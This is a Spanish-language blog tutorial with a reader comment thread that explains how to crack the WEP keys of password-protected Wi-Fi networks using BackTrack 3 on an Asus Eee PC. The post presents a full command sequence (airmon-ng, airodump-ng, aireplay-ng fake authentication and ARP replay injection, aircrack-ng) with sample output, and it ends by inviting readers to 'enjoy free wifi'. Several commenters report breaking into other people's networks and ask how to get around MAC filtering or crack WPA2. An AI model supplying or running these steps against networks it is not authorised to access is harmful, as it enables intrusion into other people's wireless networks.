Esta es una guía para conseguir la claves wep de los puntos wifi protegidos con contraseña usando una distribución de linux llamada Backtrack 3 que instalaremos en un pendrive y nuestro pequeño Asus Eee utilizando Windows xp.
Yo lo he probado con mi Eee 900 y funciona perfectamente, conseguí el password “que había olvidado” de mi casa en menos de 20 minutos.
¿Empezamos?
Requisitos previos:
Necesitaremos el Backtrack 3 versión USB: Descargar desde aqui.
Descomprimimos el archivo y obtenemos dos carpetas que debemos meter en la raiz del pendrive (usb flash memory). Por ejemplo e:
En windows vamos al menu de inicio > ejecutar > cmd
Se nos abre una “terminal” de Dos en la que tendremos que navegar hasta el pendrive, en este caso tecleamos e: y pulsamos enter.
Tecleamos: cd boot para entrar en la carpeta boot que metimos antes en e: (el pendrive). Enter.
Ahora ejecutamos el archivo bootinst.bat (escribe eso y dale al enter).
Seguimos las instrucciones y ya deberíamos tener un pendrive “bootable” con el que podremos iniciar el sistema operativo Backtrack 3 antes de arrancar windows.
Bien, ahora empieza lo divertido…
Enchufamos el pendrive en el lado izquierdo del eee, no se porqué pero vá mejor.
Reiniciamos el pc y cuando salga la pantalla gris con el logo del Eee presionamos la tecla Esc.
Nos saldrá un menu azul que nos permitirá seleccionar desde donde arrancar, elegimos obviamente el pendrive (booteable gracias a los pasos anteriores).
Ahora salen unas cosas muy raras y le damos a enter y esperamos. Tranquilos, es solo para “acojonar” luego es bastante facil.
Una vez nos carga el sistema operativo veremos que es muy similar en el aspecto gráfico al windows.
PASO 1:
NOTA: Para abrir una terminal presionamos Ctrl+Alt+T o al lado del “menu de inicio” hay un icono cuadrado negro.
En una terminal pones:
airmon-ng start wifi0
a continuación:
airodump-ng ath1
cuando encuentres tu red wifi ctrl+c para parar la búsqueda y escribes
airodump-ng -c [channel] –bssid [AP MAC] -w [filename] ath1
donde(no hay que poner corchetes):
[channel] es el canal
[AP MAC] es la dirección mac, XX:XX:XX:XX:XX
[filename] el nombre de archivo que le quieres dar, por ejemplo “casa”, recuerdalo.
PASO 2:
Abre una nueva terminal, ya sabes como…
aireplay-ng –fakeauth 0 -e [AP SSID] -a [AP MAC] ath1
donde:
[AP SSID] es el nombre del Punto de acceso: Por ejemplo WLANCASA o lo que salga ahi en la primera terminal.
Si te sale esto felicidades:
18:18:20 Sending Authentication Request
18:18:20 Authentication successful
18:18:20 Sending Association Request
18:18:20 Association successful 
Si no, intenta con lo siguiente:
Aireplay-ng –fakeauth 6000 -o 1 -q 10 -e [AP SSID] -a [AP MAC] ath1
Y te debería salir algo como esto:
18:22:32 Sending Authentication Request
18:22:32 Authentication successful
18:22:32 Sending Association Request
18:22:32 Association successful
18:22:42 Sending keep-alive packet
18:22:52 Sending keep-alive packet
Si no, olvidate.
Ahora que ya te funciona hay que empezar a inyectar, espero que no tengas miedo de las agujas…
PASO 3:
aireplay-ng -3 -b [AP MAC] ath1 -x 250
Ahora vete a la nevera y preparate una cocacola y unas aceitunas. En un par de minutos empezarás a ver como
la columna DATA de la primera terminal empieza a subir (los números, no es que se mueva de posición ¬¬).
Espera hata tener unos 40.000 más o menos y abre una tercera terminal.
PASO 4:
Quiero mi clave yaaaarl!!!
aircrack-ng -z -b [AP MAC] [filename*.cap]
En lo de filename deberias poner lo que te dije antes, en tu caso sería casa.cap o lo que hayas puesto.
Espera otro poquito, y ya te aparecerá la clave, la apuntas en un papel y listo. Reinicia con tu SO favorito
y disfruta de tu wifi gratis.
Gracias a http://www.georgehafiz.co.uk/aircrackeeepc.php
900, airmon-ng, asus, backtrack, backtrack 3, claves, crack, eee, linux, passwords, portable, wifi, wifislax, windows, windows xp, wireless
Y donde s epuede comprar el eee 900? creia que en españa no se vendia :S
Yo lo pedí por ebay y me llegó desde hong kong en menos de una semana.
Tengo una Asus 701, y he utilizado Backtrack 3, con los scrips automáticos que trae RUSSIX y me he colado en algunas, pero nunca lo habia echo manualmente, (paso x paso)
Gracias por la traducción y publicación de esta guia.
Saludos desde Guatemala.
Como se hace eso de los scripts automáticos? haz una pequeña guía y mandamela a thecuso en gmail.com
Un resumen de los scrips de Russix en Backtrack 3 en : http://nomadasniffer.blogspot.com/
Todo muy bien y sencillo pero hay un pequeño problema
Que hay que hacer cuando no te puedes asociar al router, posiblemente por el filtrado mac, o por lo que sea
Salu2
Hola!
Antes de hacer todo eso tuviste que poner la tarjeta en monitor mode? me podrias decir como instalar el driver y el patch para aircrack o si exise alguna manera de hacerlo sin tener que escribir tanto codigo? quiza algun installer?… no me aclaro … Gracias.
Yo tengo una atheros 5007 y va de lujo, habia leido mucho que no inyectaba, y me he desencriptao la mia sin saber. Solo me gustaria saber como instalarle un reproductor de videos con los respectivos codec, es la unica distribucion que no lo lleva.
>>Ahora salen unas cosas muy raras y le damos a enter y esperamos…
unas cosas muy raras?… es un unix sys V
>>Una vez nos carga el sistema operativo veremos que es muy similar en el aspecto gráfico al windows.
sin comentarios…
>>… una cocacola y unas aceitunas …
eso si que es raro!!
el asus eee pc 900 con atheros wifi (packet injection enabled) se compra aqui –> http://www.expansys.es/p.aspx?i=167011&sbadd=167011 con XP o Linux.
Cuidado tios con es sniff de redes wifi: un honeypot te puede coger con varios logs e identificar la fuente…
es un delito segun la ley
Hola amigo,
Tras llegar al paso 3 donde pongo:
airodump-ng -c1 -bssid xx:xx:xx:xx:xx:xx -w CUSACHOME ath1 tras pulsar intro me sale ésto:
Notice: you specified “-bssid”. Did you mean “–bssid” instead?
channel range already given
Muy muen manual, funciona todo correctamente, pero una preguntita… cuanto tiempo os tarda en capturar los 40000 paquetes? Una eternidad?
Por otro lado, cada vez que arranco del usb (en mi caso una SD) parece todo nuevo, no me guarda los archivos que creo o modifico, sabeis se si puede evitar esto?
MUCHAS GRACIAS
En primer lugar, enhora buena por el manual, me ha funcionado perfectamente.
Tengo una duda, esto vale por si se me olvida en mi casa la clavw WPA o solo si la que se me ha olvidado es la WEP?
Por otro lado, cuanto tiepo suele tardar? a mi la columna de data me va muy lento y si necesito 40000 puede tardar eso….
un saludo y gracias por estos manuales.
hay algun problema con los chipset atheros 5700 AR , porque no me reconoce el dispositivo con el cd live backtrack
Podra servir en mi asus eee 701…
lo pregunto antes de bajar la imagen del linux.
porque baje la imagen del wifislax y no m resulto porque
no reconocia la tarjeta wireles.
respondeme porfa
chao
New Mirror: http://russix.gadler.cc
chido, yo uso mi lap hp, con tarjeta de red broadcom y si funciona, el backtrack la reconoce en chinga
Hola,
Alguien lo ha probado en un 1000H, no me reconoce el wifi. Alguna sugerencia? Gracias
¿funcionaria para una hp mini 2133??
Hola, en mi caso todo bien hasta el último punto… luego de escribir aircrack-ng -z -b [AP MAC] casa.cap, me tira el siguiente error:
Opening casa.cap
Open failed: No such file or directory
quitting aircrack-ng
Si alguien sabe de que se trata el error, mi correo es:
malmarti@hotmail.com
Saludos…
Es posible hacerlo con un pc hp???
HOLA, TENGO EL BACKTRAK 3 Y HAY UNA HERRAMIENTA PARA NO ESCRIBIR COMANDOS, VIENE OCULTA, SI ALGUIEN QUIRE SABER COMO SE USA MANDE UN CORREO.
hola, Se puede con una desktop y un usb de 512m respondea al josec.mendez@yahoo.com
Muy bueno el principio y el final del post. PRINCIPIO=”conseguí el password “que había olvidado” de mi casa en menos de 20 minutos”. FINAL=”Reinicia con tu SO favorito y disfruta de tu wifi gratis.”
.
Me tienes que decir el proveedor que te pone wifi en tu casa y que encima lo hace de gratis
Estoy haciendo una sección sobre BT3 y el Aspire One por si a alguien le interesa (está en ingles).
http://wiki.eslimasec.com/esliwiki/BacktrackonAspireOnePost
Saludos
hola oye puedes explicar bien esta parte
airodump-ng-c[]-bssid [apmac]-w[filename] ath1
si se puede con un ejemplo porfavos pq la vdd no le entendi bien gracias por el manualito
han probado con wesside’ng -i ath0
ok
Saludos; En una lacto pavilio se puede intalar BACKTRAK 3
saludos en un sistema operativo windowsXp se pude com un pendrive?
Una pregunta, hay que instalar fisicamente el BackTrack 3 en el disco duro o solo hacemos botear desde el PenDrive asi como hace el Ubuntu ??? y una vez instalado en memoria se pueda hacer la auditoria ???
oie amigo mira. ando en las mismas solo que y o con la pequeña one. acer aspire one. pero haz de cuenta que con otars tarjetas, osea una usb, ajena a la que trae la one. captura de volada. osea la wep sale en minutos, menos de 5. pero con la one, es como en media hora, cosa que es mucho. si sabes como aumentar el numero de “#s” a un lado de data. te agradeceria enorme
mente. gracias te deje mi messenger para conectarte
hola oye tengo una compaq v3417la lo puedo hacer con esta o requiero algo mas???? si no se puede pues ni intentarle o si es que hay otra forma para estas lap´s.
y pues grax.
El tutorial si Funciona solo que hay personas que no saben ver un poco mas, –bssid y — fakeauth. ya pude conserguir las llaves de unos cuanto y el problema es que cuando el aireplay-ng –fakeauth 0 -e [AP SSID] -a [AP MAC] ath1, AP ssid tiene un nombre diferente que infinitum7899 no puede ligar la asociación revise mas manueles y comentan que se ponga una \ (Sistemas\Ing) y realiza la asociacion pero no termina el proceso, si lop pones todo junto tambien hace la busqueda pero no termina alguien me podria ayudar para ver que se hace en estos casos. no he podido realizar nada con este tipo de nombres. me prodian ayudar por favor.
Hola!
Ya lo provare
lo que si lo porve con WifiWay 1.0 beta 2 con un tuto del driver para Eee PC 900,901,904,1000(no se si es para 700)
pero yo tengo el 1000H y con este me lo detecta y por un momento eh podido recivir paquetes… y lo guardava en un archivo .cab
pero sin usar comandos, si no con el airoscrip(spahis)
el problema esta en que no se que orden de porgrama o ejecucion es el adecuado….
y que tipo de contraseñas puede averiguar,WEP o WPA??
saludos!
corre de maravilla en una pc de escritorio con tarjeta inalambrica encore
yo use una targeta dlink que la reconose ra0 y pude yegar hasta la parte Aireplay-ng –fakeauth 6000 -o 1 -q 10 -e [AP SSID] -a [AP MAC] ath1 pero me pone que el ataque no se pudo realizar debido a varios factores y uno de ellos era que el AP tenia Filtrado de Mac. que puedo hacer en este caso.
Para los que dice archivo no encontrado, pongan el asterisco al final del nombre del archivo y antes de la extension.
O sea
casa*.cab
y voila!
Hola, tengo un problema, funciona perfectamente pero solo con el canal 1, cuando es otro canal no funciona, ¿sabeis porque puede ser?, gracias
Hola, tengo un problema y es que solo puedo cracker claves con el canal 1, si es otro canal me da error, ¿ alguien podria echarme una mano ?, gracias
Hola, ayer dije que el programa solo me funciona con el canal 1, cuando lo hago con otro canal me dice que el canal tiene que ser uno, gracias
Hola, tengo una SONY VAIO VGN-N150F con WINDOWS XP PROFESSIONAL con un adaptador de red inalámbrico interno INTEL PRO/WIRELESS 3945ABG NETWORK CONNECTION y también tengo un adaptador WIRELESS USB NETGEAR WG111 v2, quiero saber si es posible utilizar el backtrack 3 en mi máquina ya sea co el adaptador interno o con el adaptador USB para realizar esta activida con redes inalámbricas protegidas con WEP
Hola de nuevo, en las instrucciones de arriba indica que hay que poner la dirección MAC de esta manera: AP MAC] es la dirección mac, XX:XX:XX:XX:XX, de que manera puedo saber cual es la dirección mac de la red a la que quiero conectarme?
Para mi gusto es mejor el live cd WIFIWAY..
No hay más que descargarlo y grabarlo en
un dvd y listo, ni comprar ni nada!
Lo descargué de descargasgratuitas.biz
roberto sacas los : y tienes la clave osea xxxxxxxxxx
tengo una TP-LINK TL-WN821N 11N Wireless Adapter me va a funcionar el backtrack 3 con este wifi???porfavor ayudaa
Buen dia amigos, esto esta para hacer en windows no?
pues alli leo que dice “Abre una terminal” y yo solo lo hago en ubuntu.
la terminal de XP es el ejecutar??
si alguien me ayuda le agradezco.
alexgoldzco en hotmail.com
Saludos desde Guatemala
Lo malo de tenerlo en live cd es que es lento e incómodo, aparte chupa mucha batería, yo suelo instalarlo aquí os dejo un link para un tutorial de la instalación del backtrack viejo que sigue siendo igual Instalar Backtrack
cuando ingreso el comando par alocalizar las redes cercanas, no localiza ninguna y mi iphone deetecta mas de 5, ke esta pasando???? ayuda please….
Solo queria decirte que antes de hacerte el “Fake Autentification” podrias usar un comando de “prueba”
Este: aireplay-ng -9 eth3 (donde eth es el interface de red)
Si te da “successful” significa que puedes hacer el “-0″ (fake)
e despues inyectar paketes…
P.s. Apenas doy mi sujestion
FROM: Portugal
hola que tal, disculpa como puedo hackear wpa2?
Hola que tal. Es realmente necesario correr esta aplicacion en una Eee?. No se puede correr en otra pc como una dell inspiron 1525?
Gracias